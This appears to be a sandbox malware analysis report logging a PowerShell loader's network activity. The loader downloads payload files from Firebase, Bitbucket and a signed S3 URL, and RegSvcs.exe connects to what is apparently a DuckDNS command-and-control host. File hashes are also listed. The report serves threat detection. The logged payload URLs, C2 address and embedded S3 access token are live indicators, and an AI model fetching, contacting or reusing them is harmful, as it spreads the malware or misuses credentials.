      GET /d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315 HTTP/1.1
      Host: bbuseruploads.s3.amazonaws.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      x-amz-id-2: 0dpz9laXYq88RMFzDV78yIb9hpdQ6wwqn1RuceT7BCXLuLTPjWf1d+3oXgeMUccf5YQBUoJnqPw=
      x-amz-request-id: GZH6QFC5Z1XG7HJE
      Date: Fri, 09 Aug 2024 01:27:28 GMT
      Last-Modified: Tue, 06 Aug 2024 17:22:59 GMT
      ETag: "aabd1a604f1a4028c9aed366338df3d0"
      x-amz-server-side-encryption: AES256
      x-amz-version-id: qJpdLnwvfTZhq5WLC.X4QTcIdjWQ3Hyy
      Content-Disposition: attachment; filename="envionuevo.txt"
      Accept-Ranges: bytes
      Content-Type: text/plain
      Server: AmazonS3
      Content-Length: 64856
    • flag-us
      DNS
      9.141.166.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      9.141.166.185.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      225.165.217.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      225.165.217.52.in-addr.arpa
      IN PTR
      Response
      225.165.217.52.in-addr.arpa
      IN PTR
      s3-1-w.amazonaws.com
    • flag-us
      DNS
      zorra123.duckdns.org
      RegSvcs.exe
      Remote address:
      8.8.8.8:53
      Request
      zorra123.duckdns.org
      IN A
      Response
      zorra123.duckdns.org
      IN A
      181.235.3.72
    • flag-us
      DNS
      72.3.235.181.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      72.3.235.181.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • 172.217.168.202:443
      https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362
      tls, http
      powershell.exe
      1.9kB
      48.5kB
      26
      41

      HTTP Request

      GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe

      HTTP Response

      200

      HTTP Request

      GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/Pe%2FPe%20Hope.txt?alt=media&token=7fe13398-6aa2-43e8-992c-35095e035362

      HTTP Response

      200
    • 204.79.197.237:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=
      tls, http2
      2.0kB
      9.3kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=9e372c43985b40e6986f57748ea597c2&localId=w:46BA0F9A-9D8F-F2F0-D464-1297A0CDD8CE&deviceId=6825833576093963&anid=

      HTTP Response

      204
    • 185.166.141.9:443
      https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txt
      tls, http
      powershell.exe
      803 B
      8.7kB
      9
      11

      HTTP Request

      GET https://bitbucket.org/dcasdc/descargas/downloads/envionuevo.txt

      HTTP Response

      302
    • 52.217.165.225:443
      URL: https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
      Protocol: tls, http
      Process: powershell.exe
      Sent: 3.2kB (36 packets)
      Received: 73.7kB (64 packets)

      HTTP Request: GET https://bbuseruploads.s3.amazonaws.com/d7391395-d01d-48b5-961f-472a0db3cdcd/downloads/c05fe59e-dc13-430a-b46b-5e855495a3a5/envionuevo.txt?response-content-disposition=attachment%3B%20filename%3D%22envionuevo.txt%22&AWSAccessKeyId=ASIA6KOSE3BNPUKA5MUH&Signature=%2BncxH5Vxtc4KFBecOd7U0pJpNcQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEEIaCXVzLWVhc3QtMSJGMEQCIArbPCNbg1UjGtvP1oG0oH0Hmyyg7%2F4%2B54J9m7ZYFRtFAiAxX49Jj4sMU6TZuYf4Blc7HCHdekIw%2F9EDtWwEnBDvmCqnAgg7EAAaDDk4NDUyNTEwMTE0NiIMjin8V1G6IR8tUuLuKoQCUq1bMun%2Fae4YCA5zLV3Clw2qh%2BqNJR42rQTX%2FZGsByNVd1rh2pfktU89eJrerxX6jcrUdBTNrhChe%2FHnQBxTgsi4keoIozkMPAgzVgs8h%2FBuVsoceeI27FQBSvBlJvInJ8hRtLPIt9Qy%2BuPebg8uEzn7LbwXiUZrTlxsXlzm5xhtZFjgH1wIFxPw5NaFAx6c5YUll0g5hPDqqfTq7uu5C6G1Vt2PxE3%2BJ4xfhAljT1hCFXC46NGXeI2IvAUnwLuqQVvoWOG3TXbxZPbj3gUMNzj%2B%2BYywydApGL3pNvueIxu72b2l8BB7gnaOrIn%2BVk3O4D%2FXWEC4jRE4wP6%2FYu%2BMmlQ8LGkws97VtQY6ngEm5pXneUlNlqE7Q91G33zEgBHlai2YxiDRNVb5NuSpPWinmdubpeOn%2F7nNDvycu6wbY0fAbqarTP4Cnoe8%2FLIJzOpX7DbIn1j7k7M%2BHSPJ1vfxT9guIMKW6NTH8QvFjJq07s3xsW%2B2zIVHmDPEx8Zpm4O5xRPACWwQkO%2BSZAwai0zPFni0u3vjW8%2FAVKAvKkEB6DUKWrizTwUlCdZZxg%3D%3D&Expires=1723168315
      HTTP Response: 200

    • 181.235.3.72:2020
      Hostname: zorra123.duckdns.org
      Protocol: tls
      Process: RegSvcs.exe
      Sent: 7.0kB (62 packets)
      Received: 6.0kB (60 packets)

    • 8.8.8.8:53
      Hostname: firebasestorage.googleapis.com
      Protocol: dns
      Process: powershell.exe
      Sent: 76 B (1 packet)
      Received: 220 B (1 packet)

      DNS Request: firebasestorage.googleapis.com
      DNS Response:
        172.217.168.202
        142.251.39.106
        142.250.179.138
        172.217.23.202
        142.250.179.170
        142.251.36.42
        142.251.36.10
        142.250.179.202
        216.58.214.10

    • 8.8.8.8:53
      Hostname: g.bing.com
      Protocol: dns
      Sent: 56 B (1 packet)
      Received: 151 B (1 packet)

      DNS Request: g.bing.com
      DNS Response:
        204.79.197.237
        13.107.21.237

    • 8.8.8.8:53
      Hostname: 202.168.217.172.in-addr.arpa
      Protocol: dns
      Sent: 74 B (1 packet)
      Received: 113 B (1 packet)

      DNS Request: 202.168.217.172.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 20.160.190.20.in-addr.arpa
      Protocol: dns
      Sent: 72 B (1 packet)
      Received: 158 B (1 packet)

      DNS Request: 20.160.190.20.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 237.197.79.204.in-addr.arpa
      Protocol: dns
      Sent: 73 B (1 packet)
      Received: 143 B (1 packet)

      DNS Request: 237.197.79.204.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 95.221.229.192.in-addr.arpa
      Protocol: dns
      Sent: 73 B (1 packet)
      Received: 144 B (1 packet)

      DNS Request: 95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 172.210.232.199.in-addr.arpa
      Protocol: dns
      Sent: 74 B (1 packet)
      Received: 128 B (1 packet)

      DNS Request: 172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      Hostname: bitbucket.org
      Protocol: dns
      Process: powershell.exe
      Sent: 59 B (1 packet)
      Received: 107 B (1 packet)

      DNS Request: bitbucket.org
      DNS Response:
        185.166.141.9
        185.166.141.8
        185.166.141.7

    • 8.8.8.8:53
      Hostname: bbuseruploads.s3.amazonaws.com
      Protocol: dns
      Process: powershell.exe
      Sent: 76 B (1 packet)
      Received: 254 B (1 packet)

      DNS Request: bbuseruploads.s3.amazonaws.com
      DNS Response:
        52.217.165.225
        52.216.29.148
        3.5.30.67
        52.216.52.161
        3.5.28.116
        3.5.28.213
        3.5.29.163
        3.5.2.158

    • 8.8.8.8:53
      Hostname: 9.141.166.185.in-addr.arpa
      Protocol: dns
      Sent: 72 B (1 packet)
      Received: 132 B (1 packet)

      DNS Request: 9.141.166.185.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 225.165.217.52.in-addr.arpa
      Protocol: dns
      Sent: 73 B (1 packet)
      Received: 107 B (1 packet)

      DNS Request: 225.165.217.52.in-addr.arpa

    • 8.8.8.8:53
      Hostname: zorra123.duckdns.org
      Protocol: dns
      Process: RegSvcs.exe
      Sent: 66 B (1 packet)
      Received: 82 B (1 packet)

      DNS Request: zorra123.duckdns.org
      DNS Response:
        181.235.3.72

    • 8.8.8.8:53
      Hostname: 72.3.235.181.in-addr.arpa
      Protocol: dns
      Sent: 71 B (1 packet)
      Received: 137 B (1 packet)

      DNS Request: 72.3.235.181.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 86.23.85.13.in-addr.arpa
      Protocol: dns
      Sent: 70 B (1 packet)
      Received: 144 B (1 packet)

      DNS Request: 86.23.85.13.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 18.31.95.13.in-addr.arpa
      Protocol: dns
      Sent: 70 B (1 packet)
      Received: 144 B (1 packet)

      DNS Request: 18.31.95.13.in-addr.arpa

    • 8.8.8.8:53
      Hostname: 172.214.232.199.in-addr.arpa
      Protocol: dns
      Sent: 74 B (1 packet)
      Received: 128 B (1 packet)

      DNS Request: 172.214.232.199.in-addr.arpa
    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize: 3KB
      MD5: f41839a3fe2888c8b3050197bc9a0a05
      SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
      SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
      SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize: 64B
      MD5: 50a8221b93fbd2628ac460dd408a9fc1
      SHA1: 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
      SHA256: 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
      SHA512: 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yifzslca.q3b.ps1
      Filesize: 60B
      MD5: d17fe0a3f47be24a6453e9ef58c94641
      SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
      SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
      SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/436-24-0x0000000000400000-0x0000000000412000-memory.dmp
      Filesize: 72KB

    • memory/436-33-0x0000000005D20000-0x0000000005D86000-memory.dmp
      Filesize: 408KB

    • memory/436-32-0x0000000006260000-0x0000000006804000-memory.dmp
      Filesize: 5.6MB

    • memory/436-31-0x0000000005C10000-0x0000000005CAC000-memory.dmp
      Filesize: 624KB

    • memory/512-23-0x00000275F82F0000-0x00000275F82FA000-memory.dmp
      Filesize: 40KB

    • memory/512-22-0x00000275F82E0000-0x00000275F82E8000-memory.dmp
      Filesize: 32KB

    • memory/4848-0-0x00007FFA3B153000-0x00007FFA3B155000-memory.dmp
      Filesize: 8KB

    • memory/4848-30-0x00007FFA3B150000-0x00007FFA3BC11000-memory.dmp
      Filesize: 10.8MB

    • memory/4848-12-0x00007FFA3B150000-0x00007FFA3BC11000-memory.dmp
      Filesize: 10.8MB

    • memory/4848-11-0x00007FFA3B150000-0x00007FFA3BC11000-memory.dmp
      Filesize: 10.8MB

    • memory/4848-1-0x000002A928C40000-0x000002A928C62000-memory.dmp
      Filesize: 136KB